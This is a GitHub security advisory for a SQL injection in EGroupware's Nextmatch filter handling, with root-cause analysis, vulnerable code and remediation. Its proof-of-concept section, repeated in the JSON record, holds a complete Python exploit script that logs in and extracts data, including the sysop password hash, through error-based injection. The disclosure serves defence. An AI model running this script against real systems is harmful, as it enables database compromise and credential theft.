GHSA-RVXJ-7F72-MHRX
Vulnerability from github – Published: 2026-01-28 20:39 – Updated: 2026-01-28 20:39
VLAI?
Summary
EGroupware has SQL Injection in Nextmatch Filter Processing
Details
Summary
Critical Authenticated SQL Injection in Nextmatch Widget Filter Processing
A critical SQL Injection vulnerability exists in the core components of EGroupware, specifically in the Nextmatch filter processing. The flaw allows authenticated attackers to inject arbitrary SQL commands into the WHERE clause of database queries. This is achieved by exploiting a PHP type juggling issue where JSON decoding converts numeric strings into integers, bypassing the is_int() security check used by the application.
Details
Root Cause Analysis
The vulnerability exists in how the database abstraction layer (Api\Db) and high-level storage classes (Api\Storage\Base, infolog_so) process the col_filter array used in "Nextmatch" widgets.
The application attempts to validate input using is_int($key) to determine if an array key represents a raw SQL fragment that should be trusted. However, when processing JSON-based POST requests, PHP's json_decode automatically converts numeric string keys (e.g., "0") into native integers.
Consequently, an attacker can send a JSON payload with an associative array containing numeric keys. The application interprets these keys as integers (is_int returns true) and blindly appends the associated values - containing malicious SQL - directly to the query.
Vulnerable Code Locations
- File:
sources/egroupware/api/src/Db.php(Approx. Line 1776) Method:column_data_implode
// In function column_data_implode
elseif (is_int($key) && $use_key===True) {
if (empty($data)) continue;
// VULNERABLE: $data is appended directly to SQL without sanitization
$values[] = $data;
}
- File:
sources/egroupware/api/src/Storage/Base.php(Approx. Line 1134) Method:parse_search
// In function parse_search
foreach($criteria as $col => $val) {
// VULNERABLE: is_int() returns true for JSON keys like "0"
if (is_int($col)) {
$query[] = $val;
}
// ...
}
PoC
The vulnerability was on a local Docker instance and confirmed (read-only) on the public demo instance (demo.egroupware.net).
Automated Exploit Script: The following script automates the login, exec_id extraction, and data exfiltration via Error-Based SQL Injection.
import requests
import re
import sys
import urllib3
# Suppress SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# CLI Configuration
BASE_URL = sys.argv[1].rstrip('/') if len(sys.argv) > 1 else "http://localhost:8088/egroupware"
LOGIN_USER = sys.argv[2] if len(sys.argv) > 2 else "sysop"
LOGIN_PASS = sys.argv[3] if len(sys.argv) > 3 else "password123"
session = requests.Session()
session.verify = False
session.headers.update({
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36"
})
def extract_form_inputs(html):
inputs = {}
matches = re.findall(r'<input[^>]+>', html)
for match in matches:
name_m = re.search(r'name=["\']([^"\']+)["\']', match)
value_m = re.search(r'value=["\']([^"\']*)["\']', match)
if name_m:
name = name_m.group(1)
value = value_m.group(1) if value_m else ""
inputs[name] = value
return inputs
def login():
print(f"[*] Target: {BASE_URL}")
login_url = f"{BASE_URL}/login.php"
try:
print("[*] Retrieving login form...")
r_get = session.get(login_url, timeout=10)
data = extract_form_inputs(r_get.text)
data.update({
"login": LOGIN_USER,
"passwd": LOGIN_PASS,
"submitit": "Login",
"passwd_type": "text"
})
if 'cancel' in data: del data['cancel']
print(f"[*] Attempting login as: {LOGIN_USER}...")
r_post = session.post(login_url, data=data, allow_redirects=True, timeout=15)
if 'name="passwd"' in r_post.text and 'logout.php' not in r_post.text:
print("[-] Login failed. Server returned login form.")
return False
print("[+] Login successful.")
return True
except Exception as e:
print(f"[-] Critical error during login: {e}")
return False
def get_exec_id():
print("[*] Retrieving exec_id...")
url = f"{BASE_URL}/index.php?menuaction=addressbook.addressbook_ui.index"
try:
r = session.get(url, timeout=10)
match = re.search(r'etemplate_exec_id(?:"|"|\\")\s*:\s*(?:"|"|\\")([^&"\\]+)', r.text)
if match:
eid = match.group(1)
print(f"[+] ID found: {eid}")
return eid
else:
if 'name="passwd"' in r.text:
print("[-] Session expired or login failed.")
else:
print("[-] exec_id pattern not found in source code.")
except Exception as e:
print(f"[-] Error retrieving ID: {e}")
return None
def run_query(eid, sql):
full = ""
url = f"{BASE_URL}/json.php?menuaction=EGroupware\\Api\\Etemplate\\Widget\\Nextmatch::ajax_get_rows"
print(f"[*] Executing SQLi: {sql}")
for offset in range(1, 201, 30):
chunk_sql = f"SUBSTRING(({sql}), {offset}, 30)"
payload = f"1=1 AND EXTRACTVALUE(1, CONCAT(0x7e, ({chunk_sql}), 0x7e))"
post_data = {
"request": {
"parameters": [eid, {"start": 0, "num_rows": 1}, {"col_filter": {"0": payload}}]
}
}
try:
r = session.post(url, json=post_data, timeout=10)
match = re.search(r"XPATH syntax error: '~(.*)~'", r.text)
if not match:
match = re.search(r"~([^~]+)~", r.text)
if match:
chunk = match.group(1)
if "..." in chunk: chunk = chunk.replace("...", "")
full += chunk
if len(chunk) < 1: break
else:
break
except Exception as e:
print(f"[-] Query error: {e}")
break
return full if full else "NO DATA / ERROR"
if __name__ == "__main__":
if login():
eid = get_exec_id()
if eid:
print("\n" + "="*40)
print(" SQL INJECTION RESULTS ")
print("="*40)
print(f"[+] DB Version: {run_query(eid, 'SELECT @@version')}")
print(f"[+] DB Name: {run_query(eid, 'SELECT database()')}")
print(f"[+] DB User: {run_query(eid, 'SELECT user()')}")
print("\n[*] Retrieving hash for 'sysop' user (if exists):")
res = run_query(eid, "SELECT CONCAT(account_lid,':',account_pwd) FROM egw_accounts WHERE account_lid='sysop'")
print(f" > {res}")
print("="*40 + "\n")
Proof of Verification on demo.egroupware.net:
The script was executed against ther public demo to confirm exploitability in a production-like environment (read-only).
Impact: Attackers with low-privileged access can fully compromise the database. This allows for: * Confidentiality Loss: Reading sensitive data (e.g., password hashes, session tokens, personal contact details, configuration secrets). * Integrity Loss: Modifying or deleting arbitrary data within the application. * Availability Loss: Potential to drop tables or corrupt data.
Remediation
1. Input Validation (Whitelisting)
Do not rely solely on is_int() for security decisions when handling external input, especially JSON data where keys can be numeric strings. Implement a strict whitelist (allowlist) of allowed column names for filtering in Nextmatch widgets. If the key/column is not in the whitelist, reject the request.
2. Parameter Binding Ensure all filter values are bound as parameters (prepared statements) rather than being concatenated directly into the SQL string.
3. Strict Type Checking
When processing JSON input, ensure that keys are strictly checked against expected types (e.g., using === for strict comparison or filter_var) before being used in SQL generation logic.
Credits
Reported by Łukasz Rybak
Severity ?
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "egroupware/egroupware"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "23.1.20260113"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "egroupware/egroupware"
},
"ranges": [
{
"events": [
{
"introduced": "26.0.20251208"
},
{
"fixed": "26.0.20260113"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-22243"
],
"database_specific": {
"cwe_ids": [
"CWE-89"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-28T20:39:27Z",
"nvd_published_at": "2026-01-28T17:16:15Z",
"severity": "HIGH"
},
"details": "### Summary\n**Critical Authenticated SQL Injection in Nextmatch Widget Filter Processing**\n\nA critical SQL Injection vulnerability exists in the core components of EGroupware, specifically in the `Nextmatch` filter processing. The flaw allows authenticated attackers to inject arbitrary SQL commands into the `WHERE` clause of database queries. This is achieved by exploiting a PHP type juggling issue where JSON decoding converts numeric strings into integers, bypassing the `is_int()` security check used by the application.\n\n### Details\n**Root Cause Analysis**\nThe vulnerability exists in how the database abstraction layer (`Api\\Db`) and high-level storage classes (`Api\\Storage\\Base`, `infolog_so`) process the `col_filter` array used in \"Nextmatch\" widgets.\n\nThe application attempts to validate input using `is_int($key)` to determine if an array key represents a raw SQL fragment that should be trusted. However, when processing JSON-based POST requests, PHP\u0027s `json_decode` automatically converts numeric string keys (e.g., `\"0\"`) into native integers.\n\nConsequently, an attacker can send a JSON payload with an associative array containing numeric keys. The application interprets these keys as integers (`is_int` returns true) and blindly appends the associated values - containing malicious SQL - directly to the query.\n\n**Vulnerable Code Locations**\n\n1. **File:** `sources/egroupware/api/src/Db.php` (Approx. Line 1776)\n Method: `column_data_implode`\n\n```php\n// In function column_data_implode\nelseif (is_int($key) \u0026\u0026 $use_key===True) {\n if (empty($data)) continue;\n // VULNERABLE: $data is appended directly to SQL without sanitization\n $values[] = $data; \n}\n```\n\n2. **File:** `sources/egroupware/api/src/Storage/Base.php` (Approx. Line 1134)\n Method: `parse_search`\n\n```php\n// In function parse_search\nforeach($criteria as $col =\u003e $val) {\n // VULNERABLE: is_int() returns true for JSON keys like \"0\"\n if (is_int($col)) {\n $query[] = $val; \n }\n // ...\n}\n```\n\n### PoC\nThe vulnerability was on a local Docker instance and confirmed (read-only) on the public demo instance ([demo.egroupware.net](http://demo.egroupware.net/)).\n\n\n**Automated Exploit Script:**\nThe following script automates the login, exec_id extraction, and data exfiltration via Error-Based SQL Injection.\n\n```python\nimport requests\nimport re\nimport sys\nimport urllib3\n\n# Suppress SSL warnings\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n# CLI Configuration\nBASE_URL = sys.argv[1].rstrip(\u0027/\u0027) if len(sys.argv) \u003e 1 else \"http://localhost:8088/egroupware\"\nLOGIN_USER = sys.argv[2] if len(sys.argv) \u003e 2 else \"sysop\"\nLOGIN_PASS = sys.argv[3] if len(sys.argv) \u003e 3 else \"password123\"\n\nsession = requests.Session()\nsession.verify = False\nsession.headers.update({\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36\"\n})\n\ndef extract_form_inputs(html):\n inputs = {}\n matches = re.findall(r\u0027\u003cinput[^\u003e]+\u003e\u0027, html)\n for match in matches:\n name_m = re.search(r\u0027name=[\"\\\u0027]([^\"\\\u0027]+)[\"\\\u0027]\u0027, match)\n value_m = re.search(r\u0027value=[\"\\\u0027]([^\"\\\u0027]*)[\"\\\u0027]\u0027, match)\n if name_m:\n name = name_m.group(1)\n value = value_m.group(1) if value_m else \"\"\n inputs[name] = value\n return inputs\n\ndef login():\n print(f\"[*] Target: {BASE_URL}\")\n login_url = f\"{BASE_URL}/login.php\"\n \n try:\n print(\"[*] Retrieving login form...\")\n r_get = session.get(login_url, timeout=10)\n \n data = extract_form_inputs(r_get.text)\n \n data.update({\n \"login\": LOGIN_USER,\n \"passwd\": LOGIN_PASS,\n \"submitit\": \"Login\",\n \"passwd_type\": \"text\"\n })\n \n if \u0027cancel\u0027 in data: del data[\u0027cancel\u0027]\n\n print(f\"[*] Attempting login as: {LOGIN_USER}...\")\n r_post = session.post(login_url, data=data, allow_redirects=True, timeout=15)\n \n if \u0027name=\"passwd\"\u0027 in r_post.text and \u0027logout.php\u0027 not in r_post.text:\n print(\"[-] Login failed. Server returned login form.\")\n return False\n \n print(\"[+] Login successful.\")\n return True\n except Exception as e:\n print(f\"[-] Critical error during login: {e}\")\n return False\n\ndef get_exec_id():\n print(\"[*] Retrieving exec_id...\")\n url = f\"{BASE_URL}/index.php?menuaction=addressbook.addressbook_ui.index\"\n try:\n r = session.get(url, timeout=10)\n \n match = re.search(r\u0027etemplate_exec_id(?:\u0026quot;|\"|\\\\\")\\s*:\\s*(?:\u0026quot;|\"|\\\\\")([^\u0026\"\\\\]+)\u0027, r.text)\n \n if match:\n eid = match.group(1)\n print(f\"[+] ID found: {eid}\")\n return eid\n else:\n if \u0027name=\"passwd\"\u0027 in r.text:\n print(\"[-] Session expired or login failed.\")\n else:\n print(\"[-] exec_id pattern not found in source code.\")\n except Exception as e:\n print(f\"[-] Error retrieving ID: {e}\")\n return None\n\ndef run_query(eid, sql):\n full = \"\"\n url = f\"{BASE_URL}/json.php?menuaction=EGroupware\\\\Api\\\\Etemplate\\\\Widget\\\\Nextmatch::ajax_get_rows\"\n \n print(f\"[*] Executing SQLi: {sql}\")\n \n for offset in range(1, 201, 30):\n chunk_sql = f\"SUBSTRING(({sql}), {offset}, 30)\"\n payload = f\"1=1 AND EXTRACTVALUE(1, CONCAT(0x7e, ({chunk_sql}), 0x7e))\"\n \n post_data = {\n \"request\": {\n \"parameters\": [eid, {\"start\": 0, \"num_rows\": 1}, {\"col_filter\": {\"0\": payload}}]\n }\n }\n \n try:\n r = session.post(url, json=post_data, timeout=10)\n \n match = re.search(r\"XPATH syntax error: \u0027~(.*)~\u0027\", r.text)\n if not match:\n match = re.search(r\"~([^~]+)~\", r.text)\n \n if match:\n chunk = match.group(1)\n if \"...\" in chunk: chunk = chunk.replace(\"...\", \"\")\n \n full += chunk\n if len(chunk) \u003c 1: break\n else:\n break\n \n except Exception as e:\n print(f\"[-] Query error: {e}\")\n break\n \n return full if full else \"NO DATA / ERROR\"\n\nif __name__ == \"__main__\":\n if login():\n eid = get_exec_id()\n if eid:\n print(\"\\n\" + \"=\"*40)\n print(\" SQL INJECTION RESULTS \")\n print(\"=\"*40)\n print(f\"[+] DB Version: {run_query(eid, \u0027SELECT @@version\u0027)}\")\n print(f\"[+] DB Name: {run_query(eid, \u0027SELECT database()\u0027)}\")\n print(f\"[+] DB User: {run_query(eid, \u0027SELECT user()\u0027)}\")\n \n print(\"\\n[*] Retrieving hash for \u0027sysop\u0027 user (if exists):\")\n res = run_query(eid, \"SELECT CONCAT(account_lid,\u0027:\u0027,account_pwd) FROM egw_accounts WHERE account_lid=\u0027sysop\u0027\")\n print(f\" \u003e {res}\")\n print(\"=\"*40 + \"\\n\")\n```\n\n**Proof of Verification** on [demo.egroupware.net](http://demo.egroupware.net/): \n\nThe script was executed against ther public demo to confirm exploitability in a production-like environment (read-only).\n\u003cimg width=\"773\" height=\"393\" alt=\"image\" src=\"https://github.com/user-attachments/assets/ae97ea37-21fa-4718-98f5-f7f9696f3c2e\" /\u003e\n\n**Impact:**\nAttackers with low-privileged access can fully compromise the database. This allows for:\n* **Confidentiality Loss:** Reading sensitive data (e.g., password hashes, session tokens, personal contact details, configuration secrets).\n* **Integrity Loss:** Modifying or deleting arbitrary data within the application.\n* **Availability Loss:** Potential to drop tables or corrupt data.\n\n### Remediation\n**1. Input Validation (Whitelisting)**\nDo not rely solely on `is_int()` for security decisions when handling external input, especially JSON data where keys can be numeric strings. Implement a strict **whitelist (allowlist)** of allowed column names for filtering in `Nextmatch` widgets. If the key/column is not in the whitelist, reject the request.\n\n**2. Parameter Binding**\nEnsure all filter values are bound as parameters (prepared statements) rather than being concatenated directly into the SQL string.\n\n**3. Strict Type Checking**\nWhen processing JSON input, ensure that keys are strictly checked against expected types (e.g., using `===` for strict comparison or `filter_var`) before being used in SQL generation logic.\n\n\n### Credits\n\nReported by \u0141ukasz Rybak",
"id": "GHSA-rvxj-7f72-mhrx",
"modified": "2026-01-28T20:39:27Z",
"published": "2026-01-28T20:39:27Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/EGroupware/egroupware/security/advisories/GHSA-rvxj-7f72-mhrx"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22243"
},
{
"type": "PACKAGE",
"url": "https://github.com/EGroupware/egroupware"
},
{
"type": "WEB",
"url": "https://github.com/EGroupware/egroupware/releases/tag/23.1.20260113"
},
{
"type": "WEB",
"url": "https://github.com/EGroupware/egroupware/releases/tag/26.0.20260113"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "EGroupware has SQL Injection in Nextmatch Filter Processing"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…